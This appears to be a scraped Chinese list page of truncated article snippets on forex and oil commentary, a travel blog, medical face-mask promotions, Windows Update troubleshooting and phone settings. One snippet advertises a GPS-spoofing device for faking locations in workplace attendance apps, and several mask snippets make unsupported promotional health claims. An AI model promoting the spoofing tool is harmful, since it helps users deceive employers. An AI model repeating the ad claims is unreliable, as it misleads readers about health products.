  8. 【原油贵金属早评】库存继续增加,油价收跌

    原标题:【原油贵金属早评】库存继续增加,油价收跌周三清晨公布美国当周API原油库存数据,上周原油库存增加281万桶至4.692亿桶,增幅超过预期的74.4万桶。且有消息人士称,沙特阿美据悉将于6月向亚洲炼油厂额外出售更多原油,印度炼油商预计将每日获得至多20万桶的额外原油供…...

    2024/3/29 16:26:39
  9. 【外汇早评】日本央行会议纪要不改日元强势

    原标题:【外汇早评】日本央行会议纪要不改日元强势近两日日元大幅走强与近期市场风险情绪上升,避险资金回流日元有关,也与前一段时间的美日贸易谈判给日本缓冲期,日本方面对汇率问题也避免继续贬值有关。虽然今日早间日本央行公布的利率会议纪要仍然是支持宽松政策,但这符…...

    2024/3/29 5:19:52
  10. 【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响

    原标题:【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响近日伊朗局势升温,导致市场担忧影响原油供给,油价试图反弹。此时OPEC表态稳定市场。据消息人士透露,沙特6月石油出口料将低于700万桶/日,沙特已经收到石油消费国提出的6月份扩大出口的“适度要求”,沙特将满…...

    2024/3/29 18:08:00
  11. 【外汇早评】美欲与伊朗重谈协议

    原标题:【外汇早评】美欲与伊朗重谈协议美国对伊朗的制裁遭到伊朗的抗议,昨日伊朗方面提出将部分退出伊核协议。而此行为又遭到欧洲方面对伊朗的谴责和警告,伊朗外长昨日回应称,欧洲国家履行它们的义务,伊核协议就能保证存续。据传闻伊朗的导弹已经对准了以色列和美国的航…...

    2024/3/29 11:11:56
  12. 【原油贵金属早评】波动率飙升,市场情绪动荡

    原标题:【原油贵金属早评】波动率飙升,市场情绪动荡因中美贸易谈判不安情绪影响,金融市场各资产品种出现明显的波动。随着美国与中方开启第十一轮谈判之际,美国按照既定计划向中国2000亿商品征收25%的关税,市场情绪有所平复,已经开始接受这一事实。虽然波动率-恐慌指数VI…...

    2024/3/29 1:13:26
  13. 【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试

    原标题:【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试美国和伊朗的局势继续升温,市场风险情绪上升,避险黄金有向上突破阻力的迹象。原油方面稍显平稳,近期美国和OPEC加大供给及市场需求回落的影响,伊朗局势并未推升油价走强。近期中美贸易谈判摩擦再度升级,美国对中…...

    2024/3/29 8:28:16
  14. 【原油贵金属早评】市场情绪继续恶化,黄金上破

    原标题:【原油贵金属早评】市场情绪继续恶化,黄金上破周初中国针对于美国加征关税的进行的反制措施引发市场情绪的大幅波动,人民币汇率出现大幅的贬值动能,金融市场受到非常明显的冲击。尤其是波动率起来之后,对于股市的表现尤其不安。隔夜美国股市出现明显的下行走势,这…...

    2024/3/29 7:41:19
  15. 【外汇早评】美伊僵持,风险情绪继续升温

    原标题:【外汇早评】美伊僵持,风险情绪继续升温昨日沙特两艘油轮再次发生爆炸事件,导致波斯湾局势进一步恶化,市场担忧美伊可能会出现摩擦生火,避险品种获得支撑,黄金和日元大幅走强。美指受中美贸易问题影响而在低位震荡。继5月12日,四艘商船在阿联酋领海附近的阿曼湾、…...

    2024/3/29 18:07:15
  16. 【原油贵金属早评】贸易冲突导致需求低迷,油价弱势

    原标题:【原油贵金属早评】贸易冲突导致需求低迷,油价弱势近日虽然伊朗局势升温,中东地区几起油船被袭击事件影响,但油价并未走高,而是出于调整结构中。由于市场预期局势失控的可能性较低,而中美贸易问题导致的全球经济衰退风险更大,需求会持续低迷,因此油价调整压力较…...

    2024/3/29 9:57:23
  17. 氧生福地 玩美北湖(上)——为时光守候两千年

    原标题:氧生福地 玩美北湖(上)——为时光守候两千年一次说走就走的旅行,只有一张高铁票的距离~ 所以,湖南郴州,我来了~ 从广州南站出发,一个半小时就到达郴州西站了。在动车上,同时改票的南风兄和我居然被分到了一个车厢,所以一路非常愉快地聊了过来。 挺好,最起…...

    2024/3/29 0:49:46
  18. 氧生福地 玩美北湖(中)——永春梯田里的美与鲜

    原标题:氧生福地 玩美北湖(中)——永春梯田里的美与鲜一觉醒来,因为大家太爱“美”照,在柳毅山庄去寻找龙女而错过了早餐时间。近十点,向导坏坏还是带着饥肠辘辘的我们去吃郴州最富有盛名的“鱼头粉”。说这是“十二分推荐”,到郴州必吃的美食之一。 哇塞!那个味美香甜…...

    2024/3/29 18:06:57
  19. 氧生福地 玩美北湖(下)——奔跑吧骚年!

    原标题:氧生福地 玩美北湖(下)——奔跑吧骚年!让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 啊……啊……啊 两…...

    2024/3/29 17:27:19
  20. 扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!

    原标题:扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!扒开伪装医用面膜,翻六倍价格宰客!当行业里的某一品项火爆了,就会有很多商家蹭热度,装逼忽悠,最近火爆朋友圈的医用面膜,被沾上了污点,到底怎么回事呢? “比普通面膜安全、效果好!痘痘、痘印、敏感肌都能用…...

    2024/3/29 18:06:36
  21. 「发现」铁皮石斛仙草之神奇功效用于医用面膜

    原标题:「发现」铁皮石斛仙草之神奇功效用于医用面膜丽彦妆铁皮石斛医用面膜|石斛多糖无菌修护补水贴19大优势: 1、铁皮石斛:自唐宋以来,一直被列为皇室贡品,铁皮石斛生于海拔1600米的悬崖峭壁之上,繁殖力差,产量极低,所以古代仅供皇室、贵族享用 2、铁皮石斛自古民间…...

    2024/3/29 18:06:22
  22. 丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者

    原标题:丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者【公司简介】 广州华彬企业隶属香港华彬集团有限公司,专注美业21年,其旗下品牌: 「圣茵美」私密荷尔蒙抗衰,产后修复 「圣仪轩」私密荷尔蒙抗衰,产后修复 「花茵莳」私密荷尔蒙抗衰,产后修复 「丽彦妆」专注医学护…...

    2024/3/28 18:26:34
  23. 广州械字号面膜生产厂家OEM/ODM4项须知!

    原标题:广州械字号面膜生产厂家OEM/ODM4项须知!广州械字号面膜生产厂家OEM/ODM流程及注意事项解读: 械字号医用面膜,其实在我国并没有严格的定义,通常我们说的医美面膜指的应该是一种「医用敷料」,也就是说,医用面膜其实算作「医疗器械」的一种,又称「医用冷敷贴」。 …...

    2024/3/29 18:06:01
  24. 械字号医用眼膜缓解用眼过度到底有无作用?

    原标题:械字号医用眼膜缓解用眼过度到底有无作用?医用眼膜/械字号眼膜/医用冷敷眼贴 凝胶层为亲水高分子材料,含70%以上的水分。体表皮肤温度传导到本产品的凝胶层,热量被凝胶内水分子吸收,通过水分的蒸发带走大量的热量,可迅速地降低体表皮肤局部温度,减轻局部皮肤的灼…...

    2024/3/28 20:09:10
  25. 配置失败还原请勿关闭计算机,电脑开机屏幕上面显示,配置失败还原更改 请勿关闭计算机 开不了机 这个问题怎么办...

    解析如下&#xff1a;1、长按电脑电源键直至关机&#xff0c;然后再按一次电源健重启电脑&#xff0c;按F8健进入安全模式2、安全模式下进入Windows系统桌面后&#xff0c;按住“winR”打开运行窗口&#xff0c;输入“services.msc”打开服务设置3、在服务界面&#xff0c;选中…...

    2022/11/19 21:17:18
  26. 错误使用 reshape要执行 RESHAPE,请勿更改元素数目。

    %读入6幅图像&#xff08;每一幅图像的大小是564*564&#xff09; f1 imread(WashingtonDC_Band1_564.tif); subplot(3,2,1),imshow(f1); f2 imread(WashingtonDC_Band2_564.tif); subplot(3,2,2),imshow(f2); f3 imread(WashingtonDC_Band3_564.tif); subplot(3,2,3),imsho…...

    2022/11/19 21:17:16
  27. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机...

    win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”问题的解决方法在win7系统关机时如果有升级系统的或者其他需要会直接进入一个 等待界面&#xff0c;在等待界面中我们需要等待操作结束才能关机&#xff0c;虽然这比较麻烦&#xff0c;但是对系统进行配置和升级…...

    2022/11/19 21:17:15
  28. 台式电脑显示配置100%请勿关闭计算机,“准备配置windows 请勿关闭计算机”的解决方法...

    有不少用户在重装Win7系统或更新系统后会遇到“准备配置windows&#xff0c;请勿关闭计算机”的提示&#xff0c;要过很久才能进入系统&#xff0c;有的用户甚至几个小时也无法进入&#xff0c;下面就教大家这个问题的解决方法。第一种方法&#xff1a;我们首先在左下角的“开始…...

    2022/11/19 21:17:14
  29. win7 正在配置 请勿关闭计算机,怎么办Win7开机显示正在配置Windows Update请勿关机...

    置信有很多用户都跟小编一样遇到过这样的问题&#xff0c;电脑时发现开机屏幕显现“正在配置Windows Update&#xff0c;请勿关机”(如下图所示)&#xff0c;而且还需求等大约5分钟才干进入系统。这是怎样回事呢&#xff1f;一切都是正常操作的&#xff0c;为什么开时机呈现“正…...

    2022/11/19 21:17:13
  30. 准备配置windows 请勿关闭计算机 蓝屏,Win7开机总是出现提示“配置Windows请勿关机”...

    Win7系统开机启动时总是出现“配置Windows请勿关机”的提示&#xff0c;没过几秒后电脑自动重启&#xff0c;每次开机都这样无法进入系统&#xff0c;此时碰到这种现象的用户就可以使用以下5种方法解决问题。方法一&#xff1a;开机按下F8&#xff0c;在出现的Windows高级启动选…...

    2022/11/19 21:17:12
  31. 准备windows请勿关闭计算机要多久,windows10系统提示正在准备windows请勿关闭计算机怎么办...

    有不少windows10系统用户反映说碰到这样一个情况&#xff0c;就是电脑提示正在准备windows请勿关闭计算机&#xff0c;碰到这样的问题该怎么解决呢&#xff0c;现在小编就给大家分享一下windows10系统提示正在准备windows请勿关闭计算机的具体第一种方法&#xff1a;1、2、依次…...

    2022/11/19 21:17:11
  32. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”的解决方法...

    今天和大家分享一下win7系统重装了Win7旗舰版系统后&#xff0c;每次关机的时候桌面上都会显示一个“配置Windows Update的界面&#xff0c;提示请勿关闭计算机”&#xff0c;每次停留好几分钟才能正常关机&#xff0c;导致什么情况引起的呢&#xff1f;出现配置Windows Update…...

    2022/11/19 21:17:10
  33. 电脑桌面一直是清理请关闭计算机,windows7一直卡在清理 请勿关闭计算机-win7清理请勿关机,win7配置更新35%不动...

    只能是等着&#xff0c;别无他法。说是卡着如果你看硬盘灯应该在读写。如果从 Win 10 无法正常回滚&#xff0c;只能是考虑备份数据后重装系统了。解决来方案一&#xff1a;管理员运行cmd&#xff1a;net stop WuAuServcd %windir%ren SoftwareDistribution SDoldnet start WuA…...

    2022/11/19 21:17:09
  34. 计算机配置更新不起,电脑提示“配置Windows Update请勿关闭计算机”怎么办?

    原标题&#xff1a;电脑提示“配置Windows Update请勿关闭计算机”怎么办&#xff1f;win7系统中在开机与关闭的时候总是显示“配置windows update请勿关闭计算机”相信有不少朋友都曾遇到过一次两次还能忍但经常遇到就叫人感到心烦了遇到这种问题怎么办呢&#xff1f;一般的方…...

    2022/11/19 21:17:08
  35. 计算机正在配置无法关机,关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机...

    关机提示 windows7 正在配置windows 请勿关闭计算机 &#xff0c;然后等了一晚上也没有关掉。现在电脑无法正常关机以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;关机提示 windows7 正在配…...

    2022/11/19 21:17:05
  36. 钉钉提示请勿通过开发者调试模式_钉钉请勿通过开发者调试模式是真的吗好不好用...

    钉钉请勿通过开发者调试模式是真的吗好不好用 更新时间:2020-04-20 22:24:19 浏览次数:729次 区域: 南阳 > 卧龙 列举网提醒您:为保障您的权益,请不要提前支付任何费用! 虚拟位置外设器!!轨迹模拟&虚拟位置外设神器 专业用于:钉钉,外勤365,红圈通,企业微信和…...

    2022/11/19 21:17:05
  37. 配置失败还原请勿关闭计算机怎么办,win7系统出现“配置windows update失败 还原更改 请勿关闭计算机”,长时间没反应,无法进入系统的解决方案...

    前几天班里有位学生电脑(windows 7系统)出问题了&#xff0c;具体表现是开机时一直停留在“配置windows update失败 还原更改 请勿关闭计算机”这个界面&#xff0c;长时间没反应&#xff0c;无法进入系统。这个问题原来帮其他同学也解决过&#xff0c;网上搜了不少资料&#x…...

    2022/11/19 21:17:04
  38. 一个电脑无法关闭计算机你应该怎么办,电脑显示“清理请勿关闭计算机”怎么办?...

    本文为你提供了3个有效解决电脑显示“清理请勿关闭计算机”问题的方法&#xff0c;并在最后教给你1种保护系统安全的好方法&#xff0c;一起来看看&#xff01;电脑出现“清理请勿关闭计算机”在Windows 7(SP1)和Windows Server 2008 R2 SP1中&#xff0c;添加了1个新功能在“磁…...

    2022/11/19 21:17:03
  39. 请勿关闭计算机还原更改要多久,电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机怎么办...

    许多用户在长期不使用电脑的时候&#xff0c;开启电脑发现电脑显示&#xff1a;配置windows更新失败&#xff0c;正在还原更改&#xff0c;请勿关闭计算机。。.这要怎么办呢&#xff1f;下面小编就带着大家一起看看吧&#xff01;如果能够正常进入系统&#xff0c;建议您暂时移…...

    2022/11/19 21:17:02
  40. 还原更改请勿关闭计算机 要多久,配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以...

    配置windows update失败 还原更改 请勿关闭计算机&#xff0c;电脑开机后一直显示以以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;配置windows update失败 还原更改 请勿关闭计算机&#x…...

    2022/11/19 21:17:01
  41. 电脑配置中请勿关闭计算机怎么办,准备配置windows请勿关闭计算机一直显示怎么办【图解】...

    不知道大家有没有遇到过这样的一个问题&#xff0c;就是我们的win7系统在关机的时候&#xff0c;总是喜欢显示“准备配置windows&#xff0c;请勿关机”这样的一个页面&#xff0c;没有什么大碍&#xff0c;但是如果一直等着的话就要两个小时甚至更久都关不了机&#xff0c;非常…...

    2022/11/19 21:17:00
  42. 正在准备配置请勿关闭计算机,正在准备配置windows请勿关闭计算机时间长了解决教程...

    当电脑出现正在准备配置windows请勿关闭计算机时&#xff0c;一般是您正对windows进行升级&#xff0c;但是这个要是长时间没有反应&#xff0c;我们不能再傻等下去了。可能是电脑出了别的问题了&#xff0c;来看看教程的说法。正在准备配置windows请勿关闭计算机时间长了方法一…...

    2022/11/19 21:16:59
  43. 配置失败还原请勿关闭计算机,配置Windows Update失败,还原更改请勿关闭计算机...

    我们使用电脑的过程中有时会遇到这种情况&#xff0c;当我们打开电脑之后&#xff0c;发现一直停留在一个界面&#xff1a;“配置Windows Update失败&#xff0c;还原更改请勿关闭计算机”&#xff0c;等了许久还是无法进入系统。如果我们遇到此类问题应该如何解决呢&#xff0…...

    2022/11/19 21:16:58
  44. 如何在iPhone上关闭“请勿打扰”

    Apple’s “Do Not Disturb While Driving” is a potentially lifesaving iPhone feature, but it doesn’t always turn on automatically at the appropriate time. For example, you might be a passenger in a moving car, but your iPhone may think you’re the one dri…...

    2022/11/19 21:16:57